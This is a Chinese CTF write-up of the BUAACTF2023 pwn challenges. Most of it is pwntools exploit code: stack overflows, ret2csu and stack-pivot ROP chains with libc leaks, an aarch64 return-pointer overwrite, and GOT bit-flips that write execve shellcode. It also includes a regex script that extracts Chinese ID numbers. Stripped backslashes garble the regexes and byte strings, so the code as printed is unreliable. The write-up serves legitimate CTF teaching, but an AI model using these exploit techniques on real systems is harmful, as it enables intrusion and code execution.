NLP
出题思路:考察Pwntools交互功能使用和正则表达式知识
解题思路:学习使用Pwntools,编写合理正则表达式语法解题即可
-
使用pwntools连接题目服务器。 -
根据题目给定的加法、减法和乘法问题,利用pwntools的recv和send功能接收问题并发送正确答案。 -
分析题目要求,利用正则表达式提取各种信息,包括电话、邮箱、URL、日期、IP地址、身份证号、薪资和工作时间等。 -
若成功通过两个测试,服务器将返回flag。
本题主要目的是教授大家如何使用pwntools编写exp脚本并运用正则表达式解决实际问题。通过本题,大家应该能够学会基本的pwntools操作和正则表达式的应用,为以后解决更复杂的pwn题打下基础。同时,本题还涉及到一些爬虫元素,使题目更加贴近实际应用场景。
from pwn import *
import re
phone_pattern = re.compile(r'bd{11}b')
email_pattern = re.compile(r'[a-zA-Z0-9._%+-]+@(?:[a-zA-Z0-9-]+.)+[a-zA-Z]{2,6}')
url_pattern = re.compile(r'https?://S+')
date_pattern = re.compile(r'd{4}年d{1,2}月d{1,2}日')
ip_pattern = re.compile(r'd{1,3}.d{1,3}.d{1,3}.d{1,3}')
id_pattern = re.compile(r'110d{14}[0-9X]')
salary_pattern = re.compile(r'd+k-d+k')
time_pattern = re.compile(r'd{1,2}:d{1,2}-d{1,2}:d{1,2}')
region_dict = {
'110101': '东城区',
'110102': '西城区',
'110105': '朝阳区',
'110106': '丰台区',
'110107': '石景山区',
'110108': '海淀区',
'110109': '门头沟区',
'110111': '房山区',
'110112': '通州区',
'110113': '顺义区',
'110114': '昌平区',
'110115': '大兴区',
'110116': '怀柔区',
'110117': '平谷区',
'110228': '密云区',
'110229': '延庆区'
}
gender_dict = {
'0': '女',
'1': '男'
}
def get_id_info(id):
region = region_dict.get(id[0:6])
year = int(id[6:10])
month = int(id[10:12])
day = int(id[12:14])
birthday = f'{year}年{month}月{day}日'
gender_code = int(id[16:17])
gender = gender_dict[str(gender_code % 2)]
return f"{id} (地区: {region}, 生日: {birthday}, 性别: {gender})"
def process_ad(ad):
phones = phone_pattern.findall(ad)
emails = email_pattern.findall(ad)
urls = url_pattern.findall(ad)
dates = date_pattern.findall(ad)
ips = ip_pattern.findall(ad)
ids = id_pattern.findall(ad)
salaries = salary_pattern.findall(ad)
times = time_pattern.findall(ad)
ids_info = [get_id_info(id) for id in ids]
output = f"电话: {', '.join(phones)} | 邮箱: {', '.join(emails)} | URL: {', '.join(urls)} | 日期: {', '.join(dates)} | IP: {', '.join(ips)} | 身份证: {', '.join(ids_info)} | 薪资: {', '.join(salaries)} | 工作时间: {', '.join(times)}"
return output
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'
conn = remote('127.0.0.1', 23335)
for i in range(20):
conn.recvuntil(b"round")
conn.recvline()
a = int(re.search(b'numberA = :(d+)', conn.recvline()).group(1))
b = int(re.search(b'numberB = :(d+)', conn.recvline()).group(1))
getline=conn.recvuntil(b": ")
if b"please tell me answer a + b: " in getline:
conn.sendline(str(a + b))
elif b"please tell me answer a * b: " in getline:
conn.sendline(str(a * b))
elif b"please tell me answer a - b: " in getline:
conn.sendline(str(a - b))
# conn.interactive()
for i in range(20):
conn.recvuntil(b"round")
ad = conn.recvuntil(b"Generated Ad:n").decode()
ad = conn.recvuntil(b"n", drop=True).decode()
extracted_info = process_ad(ad)
conn.sendline(extracted_info)
conn.interactive()
# flag{R3gEx_Ma5t3r_4nd_Pwnt00ls_Exprt!}
pirate
海盗分金问题+简单栈溢出
from pwn import *
context.log_level='debug'
context.arch='amd64'
context.os='linux'
#p=process('./pirate')
#gdb.attach(p)
p=remote('0.0.0.0','8080')
p.recvuntil(b'Boom~! You are a pirate, and now you and ')
n=int(p.recvuntil(b' ')[:-1].decode())+1
p.recvuntil(b'other pirates have ')
m=int(p.recvuntil(b' ')[:-1].decode())
coins=m-(n-1)//2
p.sendlineafter(b'How many coins you will give to pirate No.1:',str(coins).encode())
for i in range(2,n+1):
if ((n+1-i)&1)==(n&1):
p.sendlineafter(b':',b'1')
else:
p.sendlineafter(b':',b'0')
p.sendlineafter(b'Now you can give all of your gold coins to me, and say something.n',p64(0)*2+p64(0x401621)+p64(0x401236))
#pause()
p.interactive()
# BUAACTF{Y0u_4r3_th3_k1ng_0f_p1r4t3}
noshell
orw+栈迁移+ret2csu
from pwn import *
context.log_level='debug'
context.arch='amd64'
context.os='linux'
def ret2csu(func,rdi,rsi,rdx):
payload=p64(0)+p64(0)+p64(1)+p64(rdi)+p64(rsi)+p64(rdx)+p64(func)
payload+=p64(0x401350)
return payload
p=process('./noshell')
#gdb.attach(p)
libc=ELF('./libc-2.31.so')
elf=ELF('./noshell')
leave_ret_addr=0x40130b
rdi_addr=0x401373
num_addr=0x404080
csu_addr=0x401366
puts_got=0x404018
puts_plt=elf.plt['puts']
read_got=0x404020
main_addr=0x401270
payload=b'./flagx00x00'
p.sendafter(b'Let me give you a gift~n',payload)
p.sendafter(b'Can you get shell now?n',p64(0)+p64(num_addr+24)+p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(main_addr))
libcbase=u64(p.recvuntil(b'x7f').ljust(8,b'x00'))-libc.symbols['read']
print(hex(libcbase))
read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
open_addr=libcbase+libc.symbols['open']
payload+=p64(csu_addr)
payload+=ret2csu(num_addr+0x100,num_addr,0,0)
payload+=ret2csu(num_addr+0x108,3,num_addr+0x120,0x30)
payload+=ret2csu(num_addr+0x110,1,num_addr+0x120,0x30)
payload=payload.ljust(0x100,b'x00')
payload+=p64(open_addr)+p64(read_addr)+p64(write_addr)
p.sendafter(b'Let me give you a gift~n',payload)
p.sendafter(b'Can you get shell now?n',p64(0)+p64(num_addr)+p64(leave_ret_addr))
p.interactive()
#pause()
#BUAACTF{Y0u_4r3_th3_m4st3r_0f_0rw_4nd_st4ck}
ezvm
用户输入虚拟机指令,以使寄存器向上溢出到返回地址,跳转到后面函数即可get shell
from pwn import *
io=process("./challenge")
HALT=0
LD=1
payload=LD.to_bytes(4,'little')+((26)&0xffffffff).to_bytes(4,'little')+(0x401921).to_bytes(4,'little')
payload+=LD.to_bytes(4,'little')+((27)&0xffffffff).to_bytes(4,'little')+(0).to_bytes(4,'little')
payload+=HALT.to_bytes(4,'little')
# io.recv()
io.sendline(payload)
io.interactive()
# BUAACTF{Remenber to fill this after the end of competition}
rtROP
关键函数的定位
根据 qemu 命令可知是 aarch64 架构,在 IDA64 中打开,选择 ARM 架构,并选择 64 位程序
在 qemu-run.sh
的末尾增加 -gdb tcp::12345
,运行后在 IDA 中选择 Remote GDB debugger 对代码进行调试
调试后可以记住一些特殊字节(例如字符串)的地址,来算出基地址,并使用 Edit -> segments -> rebase program
功能更改基地址
设置好正确的基地址后,即可通过 Edit -> Select all
后右键选择 Edit -> Code
功能进行自动分析
在字符串中可以看到
ROM:00000000400CEE22 00 00 00 00 00 00 DCW 0, 0, 0
ROM:00000000400CEE28 42 55 41 41 43 54 46 7B 78 78+aBuaactfXxxxxxx DCB "BUAACTF{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}",0xA,0
ROM:00000000400CEE28 78 78 78 78 78 78 2D 78 78 78+ ; DATA XREF: sub_400BAF08+8↑o
跳转到 sub_400BAF08
后发现
__int64 sub_400BAF08()
{
__int64 v0; // x0
v0 = sub_400BC414("BUAACTF{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}n");
return sub_400AEF88(v0);
}
该函数为一个后门函数
此外可以根据交叉引用,找到
ROM:00000000400C81D0 38 05 0D 40 00 00 00 00 DCQ aGetFlag ; "get_flag"
ROM:00000000400C81D8 48 05 0D 40 00 00 00 00 DCQ aGetTheFlag ; "get the flag..."
ROM:00000000400C81E0 B0 4F 0A 40 00 00 00 00 DCQ sub_400A4FB0
说明 sub_400A4FB0
函数即为 get_flag
函数
该函数也可以通过调试的方法找到,思路为:在程序中输入
get_flag
,并输入Input
内容,但不输入回车,此时在 IDA 中搜索程序内存,可以找到自己的Input
内容,此时通过下硬件断点(最好在中间的某个字节下断点)的方法找到该内存被调用的地方,并逐步跟踪
get_flag 函数漏洞分析与利用
分析发现,函数的如下部分为获取输入内容(此处也可以结合动调分析):
while ( 1 )
{
sub_4008F274(0i64, &v28, 1i64);
*v38 = v28;
sub_400BC414("%c", v28, v8, v9, v10, v11, v12, v13);
if ( v28 == 10 || v28 == 13 )
break;
++v38;
++v37;
}
根据该函数内容可知,只有当输入内容为 n
,该函数才会停止接收数据,因此存在溢出漏洞
查看函数的栈,发现该输入内容并非位于栈底,在覆盖过程中将会影响其他变量
_BYTE v34[68]; // [xsp+108h] [xbp+108h] BYREF
unsigned int i; // [xsp+14Ch] [xbp+14Ch]
int v36; // [xsp+150h] [xbp+150h]
unsigned int v37; // [xsp+154h] [xbp+154h]
unsigned __int8 *v38; // [xsp+158h] [xbp+158h]
其中,v34
为输入开始处,因此在溢出后,将会影响 i
,v36
,v37
,v38
四个变量,后续代码中,i
与 v36
两个变量均被重新赋值,因此实际上不存在影响,而 v37
与 v38
是输入循环中的重要变量,分别存储了输入的总长度与当前输入的位置
考虑到后续会对输入内容进行 AES
加密,可以通过减小总长度的方式,避免最后的 ROP 内容被加密,此外,可以通过修改 v38
指针的末尾字节,将输入的指针直接指向目标位置
使用 gdb-multiarch
动调查看栈地址
输入 target remote 127.0.0.1:12345
进行远程调试
在获取用户输入后的地址下断点,查看栈地址
pwndbg> stack 50
00:0000│ x29 sp 0x401ff940 —▸ 0x401ffaa0 —▸ 0x401ffb40 —▸ 0x401ffb70 ◂— 0x1d
01:0008│ 0x401ff948 —▸ 0x400a349c ◂— mov w1, w0 /* 0xf9400fa02a0003e1 */
02:0010│ 0x401ff950 —▸ 0x401ffad8 —▸ 0x401fe92a ◂— 'get_flag'
03:0018│ 0x401ff958 ◂— 0x1400e9038
04:0020│ 0x401ff960 —▸ 0x401ff990 ◂— 'Input your flag: /> '
05:0028│ 0x401ff968 —▸ 0xd000000400995b0 ◂— ldr x0, [x29, #0x20] /* 0x91000400f94013a0 */
06:0030│ 0x401ff970 ◂— 0xeacb8d848598bd
07:0038│ 0x401ff978 ◂— 0x0
08:0040│ 0x401ff980 ◂— 0xfda8bfb9aeaeb39f
09:0048│ 0x401ff988 ◂— 0xdc
0a:0050│ 0x401ff990 ◂— 'Input your flag: /> '
0b:0058│ 0x401ff998 ◂— 'ur flag: /> '
0c:0060│ 0x401ff9a0 ◂— 0x203e2f20 /* ' /> ' */
0d:0068│ 0x401ff9a8 ◂— 0x1e2d0d2c06175c8
0e:0070│ 0x401ff9b0 ◂— 0x4ad0ea3b4b53c9c7
0f:0078│ 0x401ff9b8 ◂— movz w17, #0x531d, lsl #16 /* 0x63b7dfd052aa63b1 */
10:0080│ 0x401ff9c0 ◂— adr x19, #0x401da891 /* 0x8dae143b30ed7693 */
11:0088│ 0x401ff9c8 ◂— 0x7f38a0a369b0cdb2
12:0090│ 0x401ff9d0 ◂— 0x811ffb0ff7d60ef2
13:0098│ 0x401ff9d8 ◂— 0x684a8d4c82cfcb28
14:00a0│ 0x401ff9e0 ◂— 0x2ffc24c6de94f309
15:00a8│ 0x401ff9e8 ◂— 0x0
... ↓ 11 skipped
21:0108│ 0x401ffa48 ◂— 'AAAAAAAAAAAAAAAAr'
22:0110│ 0x401ffa50 ◂— 'AAAAAAAAr'
23:0118│ 0x401ffa58 ◂— 0xd /* 'r' */
24:0120│ 0x401ffa60 ◂— 0x0
... ↓ 4 skipped
29:0148│ 0x401ffa88 ◂— 0x1500000001
2a:0150│ 0x401ffa90 ◂— 0x1000000008
2b:0158│ 0x401ffa98 —▸ 0x401ffa58 ◂— 0xd /* 'r' */
2c:0160│ 0x401ffaa0 —▸ 0x401ffb40 —▸ 0x401ffb70 ◂— 0x1d
2d:0168│ 0x401ffaa8 —▸ 0x400a3534 ◂— cmp w0, #0 /* 0x540000617100001f */
2e:0170│ 0x401ffab0 ◂— 0x0
2f:0178│ 0x401ffab8 —▸ 0x401ffb64 ◂— 0x700000000
30:0180│ 0x401ffac0 ◂— 0x8
31:0188│ 0x401ffac8 —▸ 0x401fe92a ◂— 'get_flag'
结果如上,输入地址为 0x401ffa48
在 Arm 环境中,函数的返回地址存储在栈顶,因此在当前情况下,很难对当前函数的返回地址进行覆盖,然而,可以通过修改上一层函数的栈顶(即位于当前函数栈底)的值,控制再下一次跳转的结果
因此,可以在输入至 0x401ffa98
时,将该指针指向 0x401ffaa7
,以此来控制后续的函数跳转
Payload
根据上述思路构造的 Payload 如下:
payload = b'a' * 68 + b'b' * 4 + b'c' * 4 + b'x00' * 4 + b'xa7' + p32(0x400baf08)
# BUAACTF{9d88be72-5577-cbe6-8583-c696947baa6a}
one_chance
单字节构造rop+栈溢出
修改exit的got表1个bit,使程序流在main函数中产生循环,可以达到任意地址写的效果,然后写shellcode进行跳转。
#!/usr/bin/env python3
from pwn import *
context.log_level='debug'
#r = remote('10.212.27.23', 12138)
r = process("./one_chance")
# r.recvuntil("token: ")
gdb.attach(r,"b *40127C")
sleep(1)
def flip(addr, bit):
r.recvuntil('slip?')
r.sendline(hex(addr) + ' ' + str(bit))
target = 0x401286
flip(target + 1, 6)
shellcode_start = 0x4010C0
shellcode = b"x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05"
e = ELF('./one_chance')
for i in range(len(shellcode)):
b = shellcode[i] ^ e.read(shellcode_start + i, 1)[0]
for j in range(8):
if (b >> j) & 1:
flip(shellcode_start + i, j)
flip(target + 1, 6)
r.interactive()
easy-auto-pwn
找了一个有意思的题,现在主流的二进制研究手段离不开afl等fuzz工具,希望选手能够通过这一道简单的auto-pwn题去了解fuzz技术和工具
这个题是2020wdb玄武中fast的原题,选手做完pow后系统会自动编译一份代码并且搭建pwn环境下发端口,选手需要在极短的时间内完成100个函数的快速查找,目前网上没有特别好的题解,能解题的样例如附件所示,鼓励解题者去探索用angr等逆向辅助工具以及fuzz工具和技术快速求解。
from pwn import *
#base64 -d
#tar -xvf
#upx -d
# p = process("./pwn")
p = remote("39.107.108.120", 36774)
# elf = ELF("./pwn")
# raw = elf.read(0x400000,0x36f00)
# start1= "x55x48x89xe5x8bx05"
# start2= "x55x48x89xe5x48x81"
# function_list = []
# offset = raw.find(start1)
# while offset != -1:
# function_list.append(offset+0x400000)
# offset = raw.find(start1,offset+1)
# magic = raw.find(start2,offset+1)+0x400000
# next_calls=[]
# function={}
# for i in function_list:
# func_id_address=i+0x13
# function_id=0
# num=0
# if elf.data[func_id_address-0x400000:func_id_address-0x400000+2]=="x85xc0":
# function_id=0
# num=0x5c
# elif elf.data[func_id_address-0x400000]=="x3d":
# function_id=u32(elf.data[func_id_address-0x400000+1:func_id_address-0x400000+4+1])
# num=0x5f
# else:
# function_id=u32(elf.data[func_id_address-0x400000+2]+"x00x00x00")
# num=0x5d
# function[function_id]=i
# call_func=[]
# for j in range(11):
# call_asm=i+num+j*0xc
# tmp=u32(elf.data[call_asm-0x400000+1:call_asm-0x400000+4+1])
# tmp_addr=call_asm+5
# if tmp>0x80000000:
# tmp=tmp-0x100000000
# next_func=call_asm+5+tmp
# call_func.append(next_func)
# next_calls.append(call_func)
# print next_calls
# ans=""
# for i in range(999):
# current=function[i]
# next=function[i+1]
# ans+=str(next_calls[function_list.index(current)].index(next))
# ans+=str(next_calls[function_list.index(function[999])].index(magic))
# print ans
p.sendline(str(5642460770963085094263401006427226829824582648788972201687858596715764335873388505294553734415906820856685793867330464199188121660361594459266801634437725223305747333964063836221118617713973323087720089375299389031532671868683780981031731935996756825573772579463061725706333478408182656978574579973718380185650569294353041146262112140275573058539788078859479036709722507526119823691777908279452929141519092731592295973279954603974037860646900438648325631513292829589191867666573581406911452044279144710140044322291755989935450575934073873712815842124123493591061204373380095898340907469300409228519122074828549956626166035706722457669001506860895909587157837327607853233247164576750761862868365100337782901439502649554358765659299839991676541686432618735090040578275693744848979816168549677442520912859807250604061432264043915937134496012629857998064927460081555363609148473222492560051972133682084275782560892776105040156685553266429040684058854193541606205215023744883523412050746444226589612403429))
p.interactive()
From eurus:
先有一个6位的爆破,会收到base64编码的二进制文件和远程端口
二进制文件需要解压再upx脱壳才能得到能自动化分析的elf文件
里面有很多类似这样的函数
ssize_t __fastcall sub_42B39C(__int64 a1,__int64 a2)
{
int v2; // eax
ssize_t result; // rax
v2 = dword_64B0AC++;
if( v2 == 999 )
exit(-1);
sub_400868();
switch((unsigned int)off_43EA9C )
{
case 0u:
result = sub_40D5EC(a1,a2);
break;
case 1u:
result = sub_42514E(a1,a2);
break;
case 2u:
result = overflow();
break;
case 3u:
result = sub_429A63(a1,a2);
break;
case 4u:
result = sub_412CF4(a1,a2);
break;
case 5u:
result = sub_41BF24(a1,a2);
break;
case 6u:
result = sub_40C2D2(a1,a2);
break;
case 7u:
result = sub_423FE8(a1,a2);
break;
case 8u:
result = sub_413D7D(a1,a2);
break;
case 9u:
result = sub_433709(a1,a2);
break;
default:
result = sub_427798(a1,a2);
break;
}
return result;
}
存在一个函数可以进行溢出
ssize_t overflow()
{
char buf; // [rsp+0h][rbp-D0h]
char v2; // [rsp+CFh][rbp-1h]
v2 = getchar();
if( v2 != 10 )
exit(-1);
write(1,"WOw,U R GREAT !n",0x10uLL);
return read(0,&buf,0x200uLL);
}
由于每一个函数dword_64B0AC不等于特定值程序就会直接退出,所以程序的跳转流程其实是确定的
可以通过特定字节匹配函数,然后匹配跳转指令提取每个函数的跳转条件和对应的dword_64B0AC值,再分析输入
exp
只包含分析输入的过程,不包含解压、upx脱壳和溢出拿shell的过程
from pwn import *
#base64 -d
#tar -xvf
#upx -d
elf = ELF("./faster1")
raw = elf.read(0x400000,0x36f00)
start1= "x55x48x89xe5x8bx05" # 匹配跳转函数
start2= "x55x48x89xe5x48x81" # 匹配overflow
function_list = []
offset = raw.find(start1)
while offset != -1: # 记录所有跳转函数
function_list.append(offset+0x400000)
offset = raw.find(start1,offset+1)
magic = raw.find(start2,offset+1)+0x400000
next_calls=[]
function={}
for i in function_list:
func_id_address=i+0x13 # 对应函数dword_64B0AC值地址
function_id=0
num=0
# 通过匹配跳转指令字节获取switch偏移和对应函数dword_64B0AC值
if elf.data[func_id_address-0x400000:func_id_address-0x400000+2]=="x85xc0":
function_id=0
num=0x5c
elif elf.data[func_id_address-0x400000]=="x3d":
function_id=u32(elf.data[func_id_address-0x400000+1:func_id_address-0x400000+4+1])
num=0x5f
else:
function_id=u32(elf.data[func_id_address-0x400000+2]+"x00x00x00")
num=0x5d
function[function_id]=i
call_func=[]
# 获取call地址和对应输入
for j in range(11):
call_asm=i+num+j*0xc
tmp=u32(elf.data[call_asm-0x400000+1:call_asm-0x400000+4+1])
tmp_addr=call_asm+5
if tmp>0x80000000:
tmp=tmp-0x100000000
next_func=call_asm+5+tmp
call_func.append(next_func)
next_calls.append(call_func)
print(next_calls)
ans=""
for i in range(999): # 获取输入
current=function[i]
next=function[i+1]
ans+=str(next_calls[function_list.index(current)].index(next))
ans+=str(next_calls[function_list.index(function[999])].index(magic))
print(ans)
文案 | 高丰奕
排版 | 张 涔
审核 | 潘卓成
原文始发于微信公众号(赛博安全社团):BUAACTF2023 Pwn WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论